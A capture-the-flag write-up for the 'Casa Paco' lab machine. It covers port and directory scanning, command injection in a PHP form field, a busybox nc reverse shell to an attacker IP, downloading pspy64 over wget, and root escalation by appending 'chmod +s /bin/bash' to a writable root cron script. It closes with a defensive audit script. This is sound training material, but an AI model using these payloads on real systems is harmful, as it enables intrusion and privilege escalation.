Casa Paco

Information gathering

192.168.43.48

Port scan

┌──(root㉿kali)-[~]
└─# rustscan -a 192.168.43.48
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.43.48:22
Open 192.168.43.48:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 04:06 EDT
Initiating ARP Ping Scan at 04:06
Scanning 192.168.43.48 [1 port]
Completed ARP Ping Scan at 04:06, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:06
Completed Parallel DNS resolution of 1 host. at 04:06, 0.16s elapsed
DNS resolution of 1 IPs took 0.16s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 04:06
Scanning 192.168.43.48 [2 ports]
Discovered open port 22/tcp on 192.168.43.48
Discovered open port 80/tcp on 192.168.43.48
Completed SYN Stealth Scan at 04:06, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.43.48
Host is up, received arp-response (0.00055s latency).
Scanned at 2026-04-09 04:06:26 EDT for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:5F:EE:09 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

The domain name needs to be added to the local hosts file

192.168.43.48 casapaco.thl

ipconfig /flushdns

Directory scan

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://casapaco.thl/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,wsp,py,js,phps --exclude-length 277
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://casapaco.thl/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 277
[+] User Agent: gobuster/3.6
[+] Extensions: phps,php,html,txt,wsp,py,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 2037]
/static (Status: 301) [Size: 313] [--> http://casapaco.thl/static/]
/menu.html (Status: 200) [Size: 1969]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

Foothold

When the ls command is entered in the Plato field, the page responds with "no intentes hackearme"

The RCE injection point is most likely right here

Entering id returns output, but ls, cat and the like are blocked; let's try a reverse shell

Try replacing ls with dir

We find that there is also an llevar1.php in the current directory; use more instead of cat to read llevar.php and llevar1.php and see how they differ

llevar1.php applies no filtering, so go straight for a reverse shell

dish=busybox nc 192.168.43.49 7777 -e sh&name=1

Privilege escalation

www -> root

There is a fabada.sh in the home directory of the user pacogerente

#!/bin/bash

# Generate an activity log
echo "Ejecutado por cron el: $(date)" >> /home/pacogerente/log.txt

Consider whether it is a scheduled (cron) task

Upload pspy64 and run it to analyze

busybox wget http://192.168.43.37:8080/pspy64

We can see that fabada.sh is run periodically with root privileges

So fabada.sh can be overwritten

www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ echo ""chmod +s /bin/bash >> /home/pacogerente/fabada.sh 
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ /bin/bash -p
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ ls -al /bin/bash
-rwxr-xr-x 1 root root 1265648 Mar 29 2024 /bin/bash
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ /bin/bash -p
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ /bin/bash -p
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ /bin/bash -p
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ /bin/bash -p
bash-5.2# whoami
root
bash-5.2#
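A defender-side check for the misconfiguration this step abuses: a script that root's cron executes but that a lower-privileged user (here www-data) can modify. This is an added example, not code from the original writeup or the lab; `cron_script_risk` and its labels are my own, and the only path it reuses from the page is /home/pacogerente/fabada.sh.

```shell
#!/bin/sh
# Added audit helper (not from the original writeup). It flags the
# condition that made the fabada.sh step work: a script cron runs as root
# that a non-root user can modify, replace, or create.
# Assumptions: POSIX sh, ls(1), awk(1); the labels are my own.

mode_of()  { ls -ld -- "$1" | awk '{print $1}'; }   # e.g. -rwxrwxr-x
owner_of() { ls -ld -- "$1" | awk '{print $3}'; }

# cron_script_risk PATH [EXPECTED_OWNER]
# Prints one label and returns 1 when a lower-privileged user could change
# what root executes, 0 when the script looks safe. Owner defaults to root.
cron_script_risk() {
    f=$1
    want=${2:-root}
    # A dangling path is as bad as a writable file: whoever can create it
    # decides what root runs on the next cron tick.
    [ -e "$f" ] || { echo "missing"; return 1; }
    [ "$(owner_of "$f")" = "$want" ] || { echo "wrong-owner"; return 1; }
    case "$(mode_of "$f")" in
        ????????w*) echo "world-writable"; return 1 ;;   # 'other' write bit
        ?????w*)    echo "group-writable"; return 1 ;;   # group write bit
    esac
    # A writable parent directory lets a user rename or replace the script
    # even when the file itself is locked down.
    case "$(mode_of "$(dirname -- "$f")")" in
        ?????w*|????????w*) echo "dir-writable"; return 1 ;;
    esac
    echo "ok"
    return 0
}

# Usage: sh audit.sh /home/pacogerente/fabada.sh [more paths...]
for f in "$@"; do
    risk=$(cron_script_risk "$f") || true   # report every path, do not stop
    printf '%s: %s\n' "$f" "$risk"
done
```

Run it against every script referenced from /etc/crontab, /etc/cron.d and root's crontab; anything other than "ok" means the job's owner and permissions need fixing before the next run.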